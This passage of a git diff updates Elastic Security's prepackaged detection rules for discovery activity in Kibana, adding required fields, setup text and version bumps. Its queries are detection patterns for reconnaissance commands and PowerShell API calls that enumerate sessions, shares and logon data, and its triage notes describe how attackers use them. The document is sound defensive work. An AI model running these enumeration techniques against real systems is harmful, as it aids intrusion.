\"/BDC_QUERY:*\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11)", + "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/" + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 23, + "rule_id": "84da2554-e12a-11ec-b896-f661ea17fbcd", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "severity": "low", + "tags": [ + "Elastic", + "Host", + "Windows", + "Threat Detection", + "Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1482", + "name": "Domain Trust Discovery", + "reference": "https://attack.mitre.org/techniques/T1482/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_file_dir_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_file_dir_discovery.json deleted file mode 100644 index 87f6d713d81fc..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_file_dir_discovery.json +++ /dev/null @@ -1,49 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Enumeration of files and directories using built-in tools. Adversaries may use the information discovered to plan follow-on activity.", - "false_positives": [ - "Enumeration of files and directories may not be inherently malicious and noise may come from scripts, automation tools, or normal command line usage. It's important to baseline your environment to determine the amount of expected noise and exclude any known FP's from the rule." - ], - "from": "now-9m", - "index": [ - "logs-endpoint.events.*", - "winlogbeat-*", - "logs-windows.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "File and Directory Discovery", - "note": "## Triage and analysis\n\n### Investigating File and Directory Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for three directory-listing commands in one minute, which can indicate attempts to locate valuable files,\nspecific file types or installed programs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", - "query": "sequence by agent.id, user.name with maxspan=1m\n[process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"cmd.exe\" or process.pe.original_file_name == \"Cmd.Exe\") and process.args : \"dir\") or\n process.name : \"tree.com\"]\n[process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"cmd.exe\" or process.pe.original_file_name == \"Cmd.Exe\") and process.args : \"dir\") or\n process.name : \"tree.com\"]\n[process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"cmd.exe\" or process.pe.original_file_name == \"Cmd.Exe\") and process.args : \"dir\") or\n process.name : \"tree.com\"]\n", - "risk_score": 21, - "rule_id": "7b08314d-47a0-4b71-ae4e-16544176924f", - "severity": "low", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - "Discovery" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0007", - "name": "Discovery", - "reference": "https://attack.mitre.org/tactics/TA0007/" - }, - "technique": [ - { - "id": "T1083", - "name": "File and Directory Discovery", - "reference": "https://attack.mitre.org/techniques/T1083/" - } - ] - } - ], - "type": "eql", - "version": 5 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json index 96860eb7e6f79..bad11ed877179 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_kernel_module_enumeration.json @@ -15,6 +15,23 @@ "license": "Elastic License v2", "name": "Enumeration of Kernel Modules", "query": "event.category:process and event.type:(start or process_started) and\n process.args:(kmod and list and sudo or sudo and (depmod or lsmod or modinfo))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "2d8043ed-5bda-4caf-801c-c1feb7410504", "severity": "medium", @@ -44,5 +61,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json index 8f8bb7c4f2e31..d5ba539a83e9d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_hping_activity.json @@ -18,6 +18,23 @@ "references": [ "https://en.wikipedia.org/wiki/Hping" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "90169566-2260-4824-b8e4-8615c3b4ed52", "severity": "high", @@ -47,5 +64,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_nping_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_nping_activity.json similarity index 59% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_nping_activity.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_nping_activity.json index c9898b7414c09..4b9b6d122f347 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/linux_nping_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_linux_nping_activity.json @@ -18,6 +18,23 @@ "references": [ "https://en.wikipedia.org/wiki/Nmap" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "0d69150b-96f8-467c-a86d-a67a3378ce77", "severity": "medium", @@ -25,9 +42,27 @@ "Elastic", "Host", "Linux", - "Threat Detection" + "Threat Detection", + "Discovery" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1046", + "name": "Network Service Discovery", + "reference": "https://attack.mitre.org/techniques/T1046/" + } + ] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_information_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_information_discovery.json similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_information_discovery.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_information_discovery.json diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_configuration_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_configuration_discovery.json similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_configuration_discovery.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_configuration_discovery.json diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_connection_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_connection_discovery.json similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_network_connection_discovery.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_network_connection_discovery.json diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_process_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_process_discovery.json similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_process_discovery.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_process_discovery.json diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_user_discovery.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_user_discovery.json similarity index 100% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/ml_linux_system_user_discovery.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_ml_linux_system_user_discovery.json diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json index 1cdb1c5d8fb6d..a4f5e18d7f0f7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_net_view.json @@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Windows Network Enumeration", - "note": "## Triage and analysis\n\n### Investigating Windows Network Enumeration\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` utility to enumerate servers in the environment that hosts shared drives\nor printers. This information is useful to attackers as they can identify targets for lateral movements and search for\nvaluable shared data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Windows Network Enumeration\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` utility to enumerate servers in the environment that hosts shared drives\nor printers. This information is useful to attackers as they can identify targets for lateral movements and search for\nvaluable shared data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n (process.args : \"view\" or (process.args : \"time\" and process.args : \"\\\\\\\\*\"))\n\n\n /* expand when ancestry is available\n and not descendant of [process where event.type == (\"start\", \"process_started\") and process.name : \"cmd.exe\" and\n ((process.parent.name : \"userinit.exe\") or\n (process.parent.name : \"gpscript.exe\") or\n (process.parent.name : \"explorer.exe\" and\n process.args : \"C:\\\\*\\\\Start Menu\\\\Programs\\\\Startup\\\\*.bat*\"))]\n */\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -48,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json index 3b6f09e4d1ac1..c40581ba63ee7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_peripheral_device.json @@ -12,10 +12,33 @@ "language": "eql", "license": "Elastic License v2", "name": "Peripheral Device Discovery", - "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to\nthe computer, which can be used to identify secondary drives used for backups, mapped network drives, and removable\nmedia. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage\nservices.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and \n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "note": "## Triage and analysis\n\n### Investigating Peripheral Device Discovery\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `fsutil` utility with the `fsinfo` subcommand to enumerate drives attached to\nthe computer, which can be used to identify secondary drives used for backups, mapped network drives, and removable\nmedia. These devices can contain valuable information for attackers.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n- Determine whether this activity was followed by suspicious file access/copy operations or uploads to file storage\nservices.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"fsutil.exe\" or process.pe.original_file_name == \"fsutil.exe\") and\n process.args : \"fsinfo\" and process.args : \"drives\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "0c7ca5c2-728d-4ad9-b1c5-bbba83ecb1f4", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json index c5423d6c13eb4..56f5e6dfa8d3d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_posh_suspicious_api_functions.json @@ -14,14 +14,27 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Discovery Related Windows API Functions", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries\nlike PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not\ncontain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed.\nHowever, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Discovery Related Windows API Functions\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This\nmakes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nAttackers can use PowerShell to interact with the Win32 API to bypass command line based detections, using libraries\nlike PSReflect or Get-ProcAddress Cmdlet.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Check for additional PowerShell and command-line logs that indicate that imported functions were run.\n\n### False positive analysis\n\n- Discovery activities themselves are not inherently malicious if occurring in isolation, as long as the script does not\ncontain other capabilities, and there are no other alerts related to the user or host; such alerts can be dismissed.\nHowever, analysts should keep in mind that this is not a common way of getting information, making it suspicious.\n\n### Related rules\n\n- PowerShell PSReflect Script - 56f2e9b5-4803-4e44-a0a4-a52dc79d57fe\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n NetShareEnum or\n NetWkstaUserEnum or\n NetSessionEnum or\n NetLocalGroupEnum or\n NetLocalGroupGetMembers or\n DsGetSiteName or\n DsEnumerateDomainTrusts or\n WTSEnumerateSessionsEx or\n WTSQuerySessionInformation or\n LsaGetLogonSessionData or\n QueryServiceObjectSecurity\n )\n", "references": [ "https://github.com/BC-SECURITY/Empire/blob/9259e5106986847d2bb770c4289c0c0f1adf2344/data/module_source/situational_awareness/network/powerview.ps1#L21413", "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0109_windows_powershell_script_block_log.md" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "61ac3638-40a3-44b2-855a-985636ca985e", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -88,5 +101,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json index 6783b8053b157..1d1f7130a7a57 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_post_exploitation_external_ip_lookup.json @@ -13,12 +13,44 @@ "language": "eql", "license": "Elastic License v2", "name": "External IP Lookup from Non-Browser Process", - "note": "## Triage and analysis\n\n### Investigating External IP Lookup from Non-Browser Process\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for connections to known IP lookup services through non-browser processes or non-installed programs.\nUsing only the IP address of the compromised system, attackers can obtain valuable information such as the system's\ngeographic location, the company that owns the IP, whether the system is cloud-hosted, and more.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file\nmodifications, and any spawned child processes.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging 